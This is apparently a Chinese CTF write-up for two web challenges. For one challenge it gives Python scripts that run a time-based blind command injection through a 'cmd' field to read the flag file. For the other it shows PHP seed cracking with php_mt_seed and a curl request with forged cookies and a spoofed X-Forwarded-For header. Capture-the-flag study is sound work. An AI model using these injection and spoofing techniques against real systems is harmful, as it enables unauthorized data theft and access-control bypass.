2020钓鱼城杯 Web Writeup | iluem'Blog

2020钓鱼城杯 Web Writeup

发布 : 2020-08-27 分类 : Web 浏览 :

2020钓鱼城杯 Web Writeup

菜鸡只做了两题

easyweb

在header处可以看到post cmd,队友直接提示无回显命令执行不出网,然后搜到了一个脚本稍微改改

import requests
import re

flag_format = re.compile('flag\\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\\}')
all_letter = '-}0123456789abcdefghijklmnopqrstuvwxyz'


def get_flag(command):
    try:
        r = requests.post('http://119.3.37.185/', data={'cmd': command}, timeout=1.5)
    except:
        return True
    return False


if __name__ == '__main__':
    flag = 'flag{'
    while flag_format.match(flag) == None:
        staus = 0
        for i in all_letter:
            payload = 'cat /flag* | grep %s && sleep 1.8' % (flag + i)
            print(payload)
            if get_flag(payload):
                staus = 1
                flag += i
                print(flag)
                break
        if staus == 0:
            flag = flag[0:-1]

学习一下Nu1L题解中的脚本

import requests
import string
import time
alphalist = '}' + string.ascii_letters + string.digits
#print(alphalist)
flag = 'flag{'
url = 'http://119.3.37.185/'
while flag[-1:] != '}':
    for tmp in alphalist:
        payload = "grep -e '{}' /flag.txt && sleep 3".format(flag + tmp)
        data = {"cmd": payload}
        try:
            s = requests.post(url, data = data, timeout = 3)
        except:
            flag += tmp
            print(flag)
            break

easyseed

发现题目index.bak中给的部分源码和

php_mt_seed中给的一个例子几乎一样,题目的php回显是5.6。

Cache_-4e197d8c4187335e.

修改一下得到如下脚本

<?php
    $chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'; 
    $pass = $argv[1];
    $max = strlen($chars) - 1;
    for($i = 0; $i <  strlen($pass); $i++) {
        $number = strpos($chars, $pass[$i]);
        echo "$number $number 0 $max  ";
    }
    echo "\n";

保存为1.php,运行

root@kali:~# php 1.php vEUHaY
21 21 0 51  30 30 0 51  46 46 0 51  33 33 0 51  0 0 0 51  50 50 0 51

然后使用php_mt_seed

Cache_ef653c52b0dc29d.

在php在5.2~7.0之间一个版本

image-20200831101946179

curl -vv 122.112.252.28:20001 --cookie "lock=vEUHaY; key=nRtqGR8mtd9ZOPyI" -H
"X-Forwarded-For: 127.0.0.1"
留下足迹